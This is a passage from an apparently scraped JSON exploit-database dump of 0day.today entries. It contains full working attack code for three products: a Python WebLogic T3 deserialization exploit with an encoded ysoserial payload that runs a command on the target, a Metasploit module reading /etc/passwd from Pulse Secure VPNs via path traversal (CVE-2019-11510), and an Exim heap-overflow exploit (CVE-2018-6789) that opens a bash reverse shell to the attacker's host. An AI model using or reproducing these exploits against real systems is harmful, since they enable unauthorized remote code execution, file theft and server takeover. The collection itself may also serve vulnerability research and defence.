6f\\x72\\x79\\x74\\
x00\\x2c\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x68\\x61\\x69\\x6e\\x65\\x64\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x30\\xc7\\x97\\xec\\x28\\x7a\\x97\\x04\\x02\\x00\\x01\\x5b\\x00\\x0d\\x69\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x73\\x74\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x78\\x70\\x75\\x72\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\xbd\\x56\\x2a\\xf1\\xd8\\x34\\x18\\x99\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x05\\x73\\x72\\x00\\x3b\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x58\\x76\\x90\\x11\\x41\\x02\\xb1\\x94\\x02\\x00\\x01\\x4c\\x00\\x09\\x69\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x78\\x70\\x76\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x52\\x75\\x6e\\x74\\x69\\x6d\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x73\\x72\\x00\\x3a\\
x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x49\\x6e\\x76\\x6f\\x6b\\x65\\x72\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x87\\xe8\\xff\\x6b\\x7b\\x7c\\xce\\x38\\x02\\x00\\x03\\x5b\\x00\\x05\\x69\\x41\\x72\\x67\\x73\\x74\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x4c\\x00\\x0b\\x69\\x4d\\x65\\x74\\x68\\x6f\\x64\\x4e\\x61\\x6d\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x5b\\x00\\x0b\\x69\\x50\\x61\\x72\\x61\\x6d\\x54\\x79\\x70\\x65\\x73\\x74\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x78\\x70\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x90\\xce\\x58\\x9f\\x10\\x73\\x29\\x6c\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x02\\x74\\x00\\x0a\\x67\\x65\\x74\\x52\\x75\\x6e\\x74\\x69\\x6d\\x65\\x75\\x72\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x43\\x6c\\x61\\x73\\x73\\x3b\\xab\\x16\\xd7\\xae\\xcb\\xcd\\x5a\\x99\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x00\\x74\\x00\\x09\\x67\\x65\\x74\\x4d\\x65\\x74\\x68\\x6f\\x64\\x75\\x71\\x00\\x7e\\x00\\x1e\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\xa0\\xf0\\xa4\\x38\\x7a\\x3b\\xb3\\x42\\x02\\x00\\x00\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x1e\\x73\\x71\\x00\\x7e\\x00\\x16\\x75\\x71\\x00\\x7e\\x00\\x1b\\x00\\x00\\x00\\x02\\x70\\x75\\x71\\x00\\x7e\\x00\\x1b\\x00\\x00\\x00\\x00\\x74\\x00\\x06\\x69\\x6e\\x76\\x6f\\x6b\\x65\\x75\\x71\\x00\\x7e\\x00\\x1e\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\
x00\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x1b\\x73\\x71\\x00\\x7e\\x00\\x16\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\xad\\xd2\\x56\\xe7\\xe9\\x1d\\x7b\\x47\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x01\\x74\\x00\\x19\\x70\\x69\\x6e\\x67\\x20\\x2d\\x63\\x20\\x34\\x20\\x31\\x39\\x32\\x2e\\x31\\x36\\x38\\x2e\\x32\\x35\\x33\\x2e\\x31\\x33\\x30\\x74\\x00\\x04\\x65\\x78\\x65\\x63\\x75\\x71\\x00\\x7e\\x00\\x1e\\x00\\x00\\x00\\x01\\x71\\x00\\x7e\\x00\\x23\\x73\\x71\\x00\\x7e\\x00\\x11\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x49\\x6e\\x74\\x65\\x67\\x65\\x72\\x12\\xe2\\xa0\\xa4\\xf7\\x81\\x87\\x38\\x02\\x00\\x01\\x49\\x00\\x05\\x76\\x61\\x6c\\x75\\x65\\x78\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4e\\x75\\x6d\\x62\\x65\\x72\\x86\\xac\\x95\\x1d\\x0b\\x94\\xe0\\x8b\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x01\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x48\\x61\\x73\\x68\\x4d\\x61\\x70\\x05\\x07\\xda\\xc1\\xc3\\x16\\x60\\xd1\\x03\\x00\\x02\\x46\\x00\\x0a\\x6c\\x6f\\x61\\x64\\x46\\x61\\x63\\x74\\x6f\\x72\\x49\\x00\\x09\\x74\\x68\\x72\\x65\\x73\\x68\\x6f\\x6c\\x64\\x78\\x70\\x3f\\x40\\x00\\x00\\x00\\x00\\x00\\x00\\x77\\x08\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x78\\x78\\x76\\x72\\x00\\x12\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x76\\x65\\x72\\x72\\x69\\x64\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x71\\x00\\x7e\\x00\\x3a\"\r\n \r\n \r\nchunk3 = 
'\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x21\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x65\\x65\\x72\\x49\\x6e\\x66\\x6f\\x58\\x54\\x74\\xf3\\x9b\\xc9\\x08\\xf1\\x02\\x00\\x07\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x5b\\x00\\x08\\x70\\x61\\x63\\x6b\\x61\\x67\\x65\\x73\\x74\\x00\\x27\\x5b\\x4c\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2f\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2f\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x66\\x6f\\x3b\\x78\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x49\\x6e\\x66\\x6f\\x97\\x22\\x45\\x51\\x64\\x52\\x46\\x3e\\x02\\x00\\x03\\x5b\\x00\\x08\\x70\\x61\\x63\\x6b\\x61\\x67\\x65\\x73\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x0e\\x72\\x65\\x6c\\x65\\x61\\x73\\x65\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x5b\\x00\\x12\\x76\\x65\\x72\\x73\\x69\\x6f\\x6e\\x49\\x6e\\x66\\x6f\\x41\\x73\\x42\\x79\\x74\\x65\\x73\\x74\\x00\\x02\\x5b\\x42\\x78\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x6
6\\x6f\\xe6\\xf7\\x23\\xe7\\xb8\\xae\\x1e\\xc9\\x02\\x00\\x09\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x4c\\x00\\x09\\x69\\x6d\\x70\\x6c\\x54\\x69\\x74\\x6c\\x65\\x71\\x00\\x7e\\x00\\x05\\x4c\\x00\\x0a\\x69\\x6d\\x70\\x6c\\x56\\x65\\x6e\\x64\\x6f\\x72\\x71\\x00\\x7e\\x00\\x05\\x4c\\x00\\x0b\\x69\\x6d\\x70\\x6c\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x71\\x00\\x7e\\x00\\x05\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x00\\xff\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x13\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x4a\\x56\\x4d\\x49\\x44\\xdc\\x49\\xc2\\x3e\\xde\\x12\\x1e\\x2a\\x0c\\x00\\x00\\x78\\x70\\x77\\x46\\x21\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x09\\x31\\x32\\x37\\x2e\\x30\\x2e\\x31\\x2e\\x31\\x00\\x0b\\x75\\x73\\x2d\\x6c\\x2d\\x62\\x72\\x65\\x65\\x6e\\x73\\xa5\\x3c\\xaf\\xf1\\x00\\x00\\x00\\x07\\x00\\x00\\x1b\\x59\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x78\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x13\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x4a\\x56\\x4d\\x49\\x44\\xdc\\x49\\xc2\\x3e\\xde\\x12\\x1e\\x2a\\x0c\\x00\\x00\\x78\\x70\\x77\\x1d\\x01\\x81\\x40\\x12\\x81\\x34\\xbf\\x42\\x76\\x00\\x09\\x31\\x32\\x37\\x2e\\x30\\x2e\\x31\\x2e\\x31\\xa5\\x3c\\xaf\\xf1\\x00\\x00\\x00\\x00\\x00\\x78'\r\n \r\ntotallength = len(chunk1) + len(chunk2) + len(chunk3)\r\nprint \"[+]TOTAL payload length: \", totallength\r\n \r\n#Update the TOTAL payload length in Chunk1\r\nlen_hex = hex(totallength)\r\nprint \"[+]Payload length in HEX: \", len_hex\r\nlen_hex = 
len_hex.replace('0x', '0')\r\nprint \"[+]Payload length in HEX: \" , len_hex\r\n \r\ns1 = len_hex[:2]\r\ns2 = len_hex[2:4]\r\nlen_hex = unhexlify(s1 + s2)\r\n \r\nprint \"[+]Payload length in HEX now: \", len_hex\r\n \r\n#Update TOTAL payload length in 'chunk1' (first four bytes) on the fly if user decides to use his own ysoserial payload(Chunk2)\r\nprint \"[+]Updating Chunk1 according to the TOTAL payload length...\"\r\n \r\nchunk1 = '\\x00\\x00' + len_hex + '\\x01\\x65\\x01\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x71\\x00\\x00\\xea\\x60\\x00\\x00\\x00\\x18\\x43\\x2e\\xc6\\xa2\\xa6\\x39\\x85\\xb5\\xaf\\x7d\\x63\\xe6\\x43\\x83\\xf4\\x2a\\x6d\\x92\\xc9\\xe9\\xaf\\x0f\\x94\\x72\\x02\\x79\\x73\\x72\\x00\\x78\\x72\\x01\\x78\\x72\\x02\\x78\\x70\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x70\\x70\\x70\\x70\\x70\\x70\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x70\\x06\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x66\\x6f\\xe6\\xf7\\x23\\xe7\\xb8\\xae\\x1e\\xc9\\x02\\x00\\x09\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x4c\\x00\\x09\\x69\\x6d\\x70\\x6c\\x54\\x69\\x74\\x6c\\x65\\x74\\x00\\x12\\x4c\\x6a
\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x4c\\x00\\x0a\\x69\\x6d\\x70\\x6c\\x56\\x65\\x6e\\x64\\x6f\\x72\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x0b\\x69\\x6d\\x70\\x6c\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x71\\x00\\x7e\\x00\\x03\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x01\\x00\\x00'\r\n \r\n#print \"[+]Updated 'chunk1' : \\n\", chunk1\r\n \r\n#Get the final payload. This should have appropriate TOTAL payload lenght in 'chunk1'\r\npayload = chunk1 + chunk2 + chunk3\r\n \r\n#Adjust header for appropriate message length\r\npayload = \"{0}{1}\".format(struct.pack('!i', len(payload)), payload[4:])\r\nprint '[+]Sending payload...'\r\nsock.send(payload)\r\n \r\nprint \"[+]Done! You should see ICMP ECHO requests from your target to your attacking machine!!\"\r\nprint(\"\\n[+]Response to Request#: \\n\")\r\nresponse = sock.recv(15000)\r\nprint(response)\n\n# 0day.today [2018-01-02] #", "sourceHref": "https://0day.today/exploit/28661", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-12-04T20:01:09", "description": "Exploit for multiple platform in category web applications", "cvss3": {}, "published": "2019-08-21T00:00:00", "type": "zdt", "title": "Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-11510"], "modified": "2019-08-21T00:00:00", "id": "1337DAY-ID-33140", "href": "https://0day.today/exploit/description/33140", "sourceData": "# Exploit Title: File disclosure in Pulse Secure SSL VPN (metasploit)\r\n# Google Dork: inurl:/dana-na/ filetype:cgi\r\n# Exploit Author: 0xDezzy (Justin Wagner), Alyssa Herrera\r\n# Vendor Homepage: https://pulsesecure.net\r\n# Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4\r\n# Tested on: Linux\r\n# CVE : CVE-2019-11510 \r\nrequire 'msf/core'\r\nclass MetasploitModule < Msf::Auxiliary\r\n\tinclude 
Msf::Exploit::Remote::HttpClient\r\n\tinclude Msf::Post::File\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Pulse Secure - System file leak',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tPulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests.\r\n This exploit reads /etc/passwd as a proof of concept\r\n This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4\r\n\t\t\t},\r\n\t\t\t'References' =>\r\n\t\t\t [\r\n\t\t\t [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510' ]\r\n\t\t\t ],\r\n\t\t\t'Author' => [ '0xDezzy (Justin Wagner), Alyssa Herrera' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t 'DefaultOptions' =>\r\n\t\t {\r\n\t\t 'RPORT' => 443,\r\n\t\t 'SSL' => true\r\n\t\t },\r\n\t\t\t))\r\n\r\n\tend\r\n\r\n\r\n\tdef run()\r\n\t\tprint_good(\"Checking target...\")\r\n\t\tres = send_request_raw({'uri'=>'/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'},1342)\r\n\r\n\t\tif res && res.code == 200\r\n\t\t\tprint_good(\"Target is Vulnerable!\")\r\n\t\t\tdata = res.body\r\n\t\t\tcurrent_host = datastore['RHOST']\r\n\t\t\tfilename = \"msf_sslwebsession_\"+current_host+\".bin\"\r\n\t\t\tFile.delete(filename) if File.exist?(filename)\r\n\t\t\tfile_local_write(filename, data)\r\n\t\t\tprint_good(\"Parsing file.......\")\r\n\t\t\tparse()\r\n\t\telse\r\n\t\t\tif(res && res.code == 404)\r\n\t\t\t\tprint_error(\"Target not Vulnerable\")\r\n\t\t\telse\r\n\t\t\t\tprint_error(\"Ooof, try again...\")\r\n\t\t\tend\r\n\t\tend\r\n\tend\r\n\tdef parse()\r\n\t\tcurrent_host = datastore['RHOST']\r\n\r\n\t fileObj = File.new(\"msf_sslwebsession_\"+current_host+\".bin\", \"r\")\r\n\t words = 0\r\n\t while (line = fileObj.gets)\r\n\t \tprintable_data = line.gsub(/[^[:print:]]/, '.')\r\n\t \tarray_data = printable_data.scan(/.{1,60}/m)\r\n\t \tfor ar in array_data\r\n\t \t\tif ar != 
\"............................................................\"\r\n\t \t\t\tprint_good(ar)\r\n\t \t\tend\r\n\t \tend\r\n\t \t#print_good(printable_data)\r\n\r\n\t\tend\r\n\t\tfileObj.close\r\n\tend\r\nend\n\n# 0day.today [2019-12-04] #", "sourceHref": "https://0day.today/exploit/33140", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T17:21:06", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-03T00:00:00", "type": "zdt", "title": "Exim base64d Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-6789"], "modified": "2021-06-03T00:00:00", "id": "1337DAY-ID-36350", "href": "https://0day.today/exploit/description/36350", "sourceData": "#!/usr/bin/python\nimport sys\nimport time\nimport socket\nimport struct\n\ns = None\nf = None\n\ndef logo():\n print\n print \" CVE-2018-6789 Poc Exploit\"\n print \"@straight_blast ; [email\u00a0protected]\"\n print\n\n\ndef connect(host, port):\n global s\n global f\n s = socket.create_connection((host,port))\n f = s.makefile('rw', bufsize=0)\n\ndef p(v):\n return 
struct.pack(\"<Q\", v)\n\ndef readuntil(delim='\\n', debug = False):\n data = ''\n while not data.endswith(delim):\n data += f.read(1)\n if debug:\n print data\n return data\n\ndef write(data):\n f.write(data + \"\\n\")\n\ndef ehlo(v):\n write(\"EHLO \" + v)\n readuntil('HELP')\n\ndef unrec(v):\n write(v)\n readuntil('command')\n\ndef auth_plain(v,s = None):\n encode = v.encode('base64').replace('\\n','').replace('=','')\n if s and len(s) > 0:\n encode = encode + s\n write(\"AUTH PLAIN \" + encode)\n readuntil('data') \n\ndef one_byte_overwrite():\n v = \"C\" * 8200\n encode = v.encode('base64').replace('\\n','').replace('=','')\n encode = encode[:-1] + \"PE\"\n write(\"AUTH PLAIN \" + encode)\n readuntil('data')\n\ndef exploit(remote_host, remote_port, local_host, local_port):\n\n connect(remote_host, remote_port)\n\n print \"[0] connected to target -> \" + remote_host + \":\" + str(remote_port)\n\n time.sleep(0.5)\n \n ehlo(\"A\" * 8000) \n \n ehlo(\"B\" * 16)\n\n print \"[1] finished grooming heap with 0x6060 block space\"\n\n unrec(\"\\xff\" * 2000)\n\n ehlo(\"D\" * 8200)\n\n one_byte_overwrite()\n\n print \"[2] triggerd 1 byte overwrite vulnerability to extend the chunk size from 0x2021 to 0x20f1\"\n\n fake_header = p(0) \n fake_header += p(0x1f51)\n auth_plain(\"E\" * 176 + fake_header + \"E\" * (8200-176-len(fake_header)))\n\n print \"[3] patched following store block with fake header so extended chunk can be freed\"\n\n ehlo(\"F\" * 16)\n\n print \"[4] freed extended store block\"\n\n unrec(\"\\xff\" * 2000) #filler against freed block\n \n unrec(\"\\xff\" * 2000) #filler against freed block\n\n fake_header = p(0x4110)\n fake_header += p(0x1f50) \n auth_plain(\"G\" * 176 + fake_header + \"G\" * (8200-176-len(fake_header)))\n\n print \"[5] patched store block with fake header so extended chunk can be malloced\"\n\n #acl_store_block_partial_address = \"\\x80\\xa4\\x6e\"\n acl_store_block_partial_address = \"\\xe0\\xc8\\x6c\"\n \n auth_plain(\"H\" * 8200 + 
p(0x2021) + acl_store_block_partial_address, \"X\")\n \n print \"[6] finished using extend chunk to overwrite the overlapping store block's next pointer to an acl store block address\"\n\n ehlo(\"I\" * 16)\n\n print \"[7] triggered smtp_reset_3(); with EHLO\"\n\n # 288 is for github build\n # 1000 is for debian build\n #acl_smtp_rcpt_offset = 288\n acl_smtp_rcpt_offset = 1000-16\n\n cmd = \"/bin/bash -c \\\"/bin/bash -i >& /dev/tcp/\" + local_address + \"/\" + str(local_port) + \" 0>&1\\\"\"\n cmd_expansion_string = \"${run{\" + cmd + \"}}\\0\"\n\n auth_plain(\"J\" * acl_smtp_rcpt_offset + cmd_expansion_string + \"\\0\" * (8200 - acl_smtp_rcpt_offset - len(cmd_expansion_string))) \n\n print \"[8] malloced acl store block and overwrite the content of acl_smtp_rcpt with shell expression\"\n\n write(\"MAIL FROM:<[email\u00a0protected]>\") ; readuntil()\n\n write(\"RCPT TO:<[email\u00a0protected]>\") \n\n print \"[9] triggered RCPT TO which executes shell expression ... enjoy your shell!\"\n\n print\n\nif __name__ == '__main__':\n logo()\n if len(sys.argv) < 5:\n print \"Usage: ./exploit <remote_address> <remote_port> <local_address> <local_port>\\n\"\n exit()\n remote_address = sys.argv[1]\n remote_port = int(sys.argv[2])\n local_address = sys.argv[3]\n local_port = int(sys.argv[4])\n #print remote_address, remote_port, local_address, local_port\n exploit(remote_address, remote_port, local_address, local_port)\n", "sourceHref": "https://0day.today/exploit/36350", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mssecure": [{"lastseen": "2020-04-30T23:04:13", 